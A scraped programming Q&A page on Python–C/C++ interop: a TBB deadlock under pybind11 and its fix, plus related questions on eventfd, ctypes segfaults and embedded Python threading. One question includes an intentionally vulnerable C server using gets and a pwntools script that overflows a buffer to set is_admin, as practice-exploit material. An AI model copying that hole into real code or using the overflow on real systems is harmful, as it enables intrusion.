Deadlock when combining Python with TBB - python

Here I would like to offer a complete test case showing a simple TBB parallel_for construct causing deadlock in a Python application. Python frontend is combined with TBB backend using pybind11:
void backend_tbb(vector<int>& result, std::function<int (int)>& callback)
{
int nthreads = tbb::task_scheduler_init::default_num_threads();
const char* cnthreads = getenv("TBB_NUM_THREADS");
if (cnthreads) nthreads = std::max(1, atoi(cnthreads));
tbb::task_group group;
tbb::task_arena arena(nthreads, 1);
tbb::task_scheduler_init init(nthreads);
group.run( [&] {
tbb::parallel_for(tbb::blocked_range<int>(0, result.size()),
[&](const tbb::blocked_range<int>& range)
{
for (int i = range.begin(); i != range.end(); i++)
result[i] = callback(i);
});
});
arena.execute( [&] { group.wait(); });
}
void backend_serial(vector<int>& result, std::function<int (int)>& callback)
{
for (int i = 0; i < result.size(); i++)
result[i] = callback(i);
}
PYBIND11_MODULE(python_tbb, m)
{
pybind11::bind_vector<std::vector<int> >(m, "stdvectorint");
m.def("backend_tbb", &backend_tbb, "TBB backend");
m.def("backend_serial", &backend_serial, "Serial backend");
}
With backend_tbb uncommented, app deadlocks infinitely:
from python_tbb import *
import numpy as np
def callback(a) :
return int(a) * 10
def main() :
length = 10
result1 = stdvectorint(np.zeros(length, np.int32))
result2 = stdvectorint(np.zeros(length, np.int32))
backend_serial(result1, callback)
# XXX Uncomment this to get the program hang
#backend_tbb(result2, callback)
for i in range(length) :
print("%d vs %d" % (result1[i], result2[i]))
if __name__ == "__main__" :
main()
I've tried gil_scoped_acquire/gil_scoped_release, but no change. Similar solution reportedly works for OpenMP loop - but again no luck when I try to do the same for TBB. Please kindly advice on this case, thanks!

The issue is that TBB tasks get spawned inside task_arena instance associated with the task_group, but the waiting is done inside another task_arena instance, called arena. This can lead to the deadlock. To fix the issue, try wrapping the call to group.run() into task_arena.execute() similarly as it is done for group.wait().
However, in this case, the latter wrapping seems superfluous. So, you might want to combine two wrappings into one
arena.execute() {
group.run( /* ... */ );
group.wait();
}
which, in this particular example, makes the use of task_group unnecessary since the master thread spawns the tasks and immediately joins for participating in their execution, similarly as it is done in tbb::parallel_for. Thus, task_group can be merely removed.

Related

GDB failing with Pwntools on log: (gdb) Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target... Remote connection closed

Bottom line up front, my problem:
Rather, I would expect gdb to be stopped at a SIGINT instead of what is happening. I believe the SIGINT is triggered or at least gets has been called, because I don't seem to get this error until I reach that part of the code.
I've looked around for solutions, and already have tried:
sudo apt-get update --fix-missing
sudo apt-get source libc6
sudo apt-get install gdb-server
I am running on WSL / Kali
NAME="Kali GNU/Linux"
ID=kali
VERSION="2021.3"
VERSION_ID="2021.3"
VERSION_CODENAME="kali-rolling"
I'm roughly following a tutorial (although with a different target ELF) on exploiting a buffer overflow where source code is using gets.
I'm not asking for help with the exploitation, but rather with solving a problem automating Gdb through Pwntools.
The Rapid7 tutorial I'm following explains to use info frame, like:
(gdb) info frame
Stack level 0, frame at 0x7fffffffdde0:
rip = 0x7ffff7a42428 in __GI_raise (../sysdeps/unix/sysv/linux/raise.c:54); saved rip = 0x400701
called by frame at 0x7fffffffde30
source language c.
Arglist at 0x7fffffffddd0, args: sig=2
Locals at 0x7fffffffddd0, Previous frame's sp is 0x7fffffffdde0
Saved registers:
rip at 0x7fffffffddd8
and then use the value of locals (0x7fffffffddd0 in the tutorial's case) with x/200x like:
x/200x 0x7fffffffddd0
...to inspect the relevant buffers.
The source for the program I'm exploiting is as follows. I add in raise(SIGINT); after the gets call to stop and inspect the stack. The python I wrote already exploits to reach that SIGINT.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
//gcc vuln.c -fno-stack-protector -no-pie -z execstack -o vuln
__attribute__((constructor)) void ignore_me(){
setbuf(stdin, NULL);
setbuf(stdout, NULL);
setbuf(stderr, NULL);
}
#define MAX_USERS 5
struct user {
char username[16];
char password[16];
};
void server() {
int choice;
char buf[0x10];
struct user User[MAX_USERS];
int num_users = 0;
int is_admin = 0;
char server_name[0x20] = "my_cool_server!";
while(1) {
puts("+=========:[ Menu ]:========+");
puts("| [1] Create Account |");
puts("| [2] View User List |");
puts("| [3] Change Server Name |");
puts("| [4] Log out |");
puts("+===========================+");
printf("\n > ");
if (fgets(buf, sizeof(buf), stdin) == NULL) {
exit(-1);
}
printf("is_admin: %d\n", is_admin);
printf("num_users: %d\n", num_users);
printf("buf size: %d\n", sizeof(buf));
choice = atoi(buf);
switch(choice) {
case 1:
if (num_users > 5)
puts("The server is at its user limit.");
else {
printf("Enter the username:\n > ");
fgets(User[num_users].username,15,stdin);
printf("Enter the password:\n > ");
fgets(User[num_users].password,15,stdin);
puts("User successfully created!\n");
num_users++;
}
break;
case 2:
if (num_users == 0)
puts("There are no users on this server yet.\n");
else {
for (int i = 0; i < num_users; i++) {
printf("%d: %s",i+1, User[i].username);
}
}
break;
case 3:
if (!is_admin) {
puts("You do not have administrative rights. Please refrain from such actions.\n");
break;
}
else {
printf("The server name is stored at %p\n",server_name);
printf("Enter new server name.\n > ");
gets(server_name);
raise(SIGINT);
break;
}
case 4:
puts("Goodbye!");
return;
}
}
}
void main() {
puts("Welcome to this awesome server!");
puts("I hired a professional to make sure its security is top notch.");
puts("Have fun!\n");
server();
}
My python (note that the gdb.execute() commands are what I'm trying to automate):
import os
os.system('clear')
def print_stdout(p):
out_list = p.read().decode("utf-8").split('\n')
#for out in out_list:
#print(out)
from pwn import *
#context.log_level = 'error'
p = gdb.debug("./vuln", api=True)
p.gdb.execute('continue')
print_stdout(p)
# enter Create Account menu 4 times (overflows do not occur until the 4th iteration)
for i in range(0,4):
# The first 14+ bytes don't seem to matter
free_padding = b'f' * 14
# The second 14 bytes seem to require 0's
# I wonder if this 14 + 1 number has something to do with the 15 bytes being read by username
num_padding = b'0' * 14
payload = free_padding + num_padding + b'1'
#print(f"Payload: {payload}")
# send buffer which will be interpreted as 1 by the menu selection logic
p.sendline(payload)
print_stdout(p)
# At 29 non-zero bytes an overflow into is_admin appears.
payload2 = b'1' * 29
p.sendline(payload2)
print_stdout(p)
# The password may have potential to be involved in the overflow, but isn't necessary.
payload3 = b'password'
p.sendline(payload3)
print_stdout(p)
#print('----------------')
# Since is_admin is no longer zero, we can enter the Change Server Name interface.
#gdb.attach(p)
p.sendline(b'3')
print_stdout(p)
p.sendline(cyclic(100, n=8))
# here we should get a breakpoint and use:
# p.gdb.execute('info frame')
# then parse the locals address, assign it to locals_addr and use:
# p.gdb.execute(f"x/200x {locals_addr}")
The error, as I stated in the comments, triggered when I try this (and it doesnt seem to trigger until the SIGINT is reached, hence my inclusion of all the code) is:
(gdb) Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target... Remote connection closed

os.eventfd_read does not set counter back to zero

I am using os.eventfd (new in Python 3.10) for IPC between a C process and a Python process. The Python process is run by fork-execv from C.
The eventfd and epoll are set up in C, and the eventfd file descriptor is passed to Python.
According to the Linux docs: "If EFD_SEMAPHORE was not specified and the eventfd counter has a nonzero value, then a read(2) returns 8 bytes containing that value, and the counter's value is reset to zero." So I would expect that a read would occur once, then not again, or subsequent reads should return 0 after the first read. But that's not what happens, it keeps returning the same value over and over again.
The C program sets up the eventfd and epoll:
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/eventfd.h>
#include <sys/epoll.h>
int eventfd_initialize()
{
int efd = eventfd(0,0);
return efd;
}
int epoll_initialize(int efd, int64_t * output_array)
{
struct epoll_event ev;
int epoll_fd = epoll_create1(0);
if(epoll_fd == -1)
{
fprintf(stderr, "Failed to create epoll file descriptor\n");
return 1;
}
ev.events = EPOLLIN; //May also need to be or'ed with EPOLLOUT
ev.data.fd = efd; //was 0
if(epoll_ctl(epoll_fd, EPOLL_CTL_ADD, efd, &ev) == -1)
{
fprintf(stderr, "Failed to add file descriptor to epoll\n");
close(epoll_fd);
return 1;
}
output_array[0] = epoll_fd;
output_array[1] = (int64_t)&ev;
return 0;
}
ssize_t epoll_write(int epoll_fd, struct epoll_event * event_struc, int action_code)
{
char ewbuf[8];
sprintf(ewbuf, "%d", action_code);
int maxevents = 1;
int timeout = -1;
write(epoll_fd, &ewbuf, 8);
epoll_wait(epoll_fd, event_struc, maxevents, timeout);
return 0;
}
The C program writes to the eventfd before the Python script is initialized, then the Python script is called with fork-exec. The Python script is a simple while True loop:
#!/usr/bin/python3
import sys
import os
from multiprocessing import shared_memory
event_fd = int(sys.argv[3])
os.set_blocking(event_fd, False)
existing_shm = shared_memory.SharedMemory(name='shm_object_0_0',create=False)
while True:
print("Waiting in Python for event")
v = os.eventfd_read(event_fd)
print("found")
print(v)
if v != 99:
print("release semaphore")
os.eventfd_write(event_fd, v)
if v == 99:
print("finally")
os.close(event_fd)
So I would expect it to read once, then all subsequent reads would return zero before the C side has written more to the eventfd. But I get this continuous display:
Waiting in Python for event
found
13361
release semaphore
Waiting in Python for event
found
13361
release semaphore
Waiting in Python for event
found
13361
release semaphore
Waiting in Python for event
found
13361
release semaphore
With each new read it returns the same number, not 0. The docs say a read from the eventfd will set it back to zero. Adding time.sleep(1) to Python doesn't change the behavior.
Also, I don't see any way to call epoll_wait in the Python os docs.

How do I call global functions on Python objects?

I've seen this page: https://docs.python.org/3/c-api/object.html but there doesn't seem to be any way to call functions like long_lshift or long_or.
It's not essential to me to call these functions, I could also live with the more generic versions, although I'd prefer to call these. Anyways, is there any way to use these? What do I need to include? Below is some example code, where I'd like to use them (simplified):
size_t parse_varint(parse_state* state) {
int64_t value[2] = { 0, 0 };
size_t parsed = parse_varint_impl(state, value);
PyObject* low = PyLong_FromLong(value[0]);
PyObject* high;
if (value[1] > 0) {
high = PyLong_FromLong(value[1]);
PyObject* shift = PyLong_FromLong(64L);
PyObject* high_shifted = long_lshift(high, shift);
state->out = long_or(low, high_shifted);
} else {
state->out = low;
}
PyObject_Print(state->out, stdout, 0);
return 0;
}
I couldn't find these functions in documentation, but they appear to be exported in Python.h header:
PyNumber_Lshift is the replacement for long_shift in my code.
Similarly, PyNumber_Or is the replacement for long_or in my code.

fgetc causes a segfault after running the second time

I have an application that tries to read a specific key file and this can happen multiple times during the program's lifespan. Here is the function for reading the file:
__status
_read_key_file(const char * file, char ** buffer)
{
FILE * pFile = NULL;
long fsize = 0;
pFile = fopen(file, "rb");
if (pFile == NULL) {
_set_error("Could not open file: ", 1);
return _ERROR;
}
// Get the filesize
while(fgetc(pFile) != EOF) {
++fsize;
}
*buffer = (char *) malloc(sizeof(char) * (fsize + 1));
// Read the file and write it to the buffer
rewind(pFile);
size_t result = fread(*buffer, sizeof(char), fsize, pFile);
if (result != fsize) {
_set_error("Reading error", 0);
fclose(pFile);
return _ERROR;
}
fclose(pFile);
pFile = NULL;
return _OK;
}
Now the problem is that for a single open/read/close it works just fine, except when I run the function the second time - it will always segfault at this line: while(fgetc(pFile) != EOF)
Tracing with gdb, it shows that the segfault occurs deeper within the fgetc function itself.
I am a bit lost, but obviously am doing something wrong, since if I try to tell the size with fseek/ftell, I always get a 0.
Some context:
Language: C
System: Linux (Ubuntu 16 64bit)
Please ignore functions
and names with underscores as they are defined somewhere else in the
code.
Program is designed to run as a dynamic library to load in Python via ctypes
EDIT
Right, it seems there's more than meets the eye. Jean-François Fabre spawned an idea that I tested and it worked, however I am still confused to why.
Some additional context:
Suppose there's a function in C that looks something like this:
_status
init(_conn_params cp) {
_status status = _NONE;
if (!cp.pkey_data) {
_set_error("No data, open the file", 0);
if(!cp.pkey_file) {
_set_error("No public key set", 0);
return _ERROR;
}
status = _read_key_file(cp.pkey_file, &cp.pkey_data);
if (status != _OK) return status;
}
/* SOME ADDITIONAL WORK AND CHECKING DONE HERE */
return status;
}
Now in Python (using 3.5 for testing), we generate those conn_params and then call the init function:
from ctypes import *
libCtest = CDLL('./lib/lib.so')
class _conn_params(Structure):
_fields_ = [
# Some params
('pkey_file', c_char_p),
('pkey_data', c_char_p),
# Some additonal params
]
#################### PART START #################
cp = _conn_params()
cp.pkey_file = "public_key.pem".encode('utf-8')
status = libCtest.init(cp)
status = libCtest.init(cp) # Will cause a segfault
##################### PART END ###################
# However if we do
#################### PART START #################
cp = _conn_params()
cp.pkey_file = "public_key.pem".encode('utf-8')
status = libCtest.init(cp)
# And then
cp = _conn_params()
cp.pkey_file = "public_key.pem".encode('utf-8')
status = libCtest.init(cp)
##################### PART END ###################
The second PART START / PART END will not cause the segfault in this context.
Would anyone know a reason to why?

How to use multi-threading to two c++ functions with embedding python?

I am learning embedding python in c++ code. I have trouble to use multi-threading to parallelize two c++ functions with embedding python.
My sample codes are shown below:
thread_test.py
import time
def test1():
time.sleep(5) # delays for 5 seconds
print 1935
return 'happy'
def test2():
time.sleep(10) # delays for 10 seconds
print 3000
py_thread.h
string test_func1(string file_dir){
string result_dir;
string str = "import sys; sys.path.insert(0," "\'"+file_dir+"\'"+")";
const char * c = str.c_str();
PyRun_SimpleString (c);
PyObject * pModule,* pFunc, *pName, *presult, *pArgs;
pName = PyString_FromString("thread_test");
pModule = PyImport_Import(pName);
Py_DECREF(pName);
pFunc = PyObject_GetAttrString(pModule, "test1");
if(pFunc != NULL) {
presult=PyObject_CallObject(pFunc,NULL);
result_dir = PyString_AsString(presult);
}
else {
printf("pFunc returned NULL\n");
}
Py_DECREF(pModule);
Py_DECREF(pFunc);
return result_dir;
}
void test_func2(string file_dir){
// Almost the same test_func1 except replacing "test1" with "test2" and no return value of result_dir
}
In main class, if I don't use multi-threading and just run the two functions and other normal c++ functions in serious, it works. But if I use some c++ threading techniques, such as OPENMP, it will give me SEGMENTATION FAULT. (code is shown below)
main.cpp
int main(){
Py_Initialize();
#pragma omp parallel num_threads(2)
{
int i = omp_get_thread_num();
if(i == 0)
{
test_func1("../");
}
if(i == 1 || omp_get_num_threads() != 2)
{
ANOTHER_C++_ONLY_SIMPLE_FUNCTION();
test_func2("../");
}
}
Py_Finalize();
return 0;
}
I also have tried thread in c++11 and pthread. They all give me segmentation fault. So how can I parallelize the two function???
Thank you!

Categories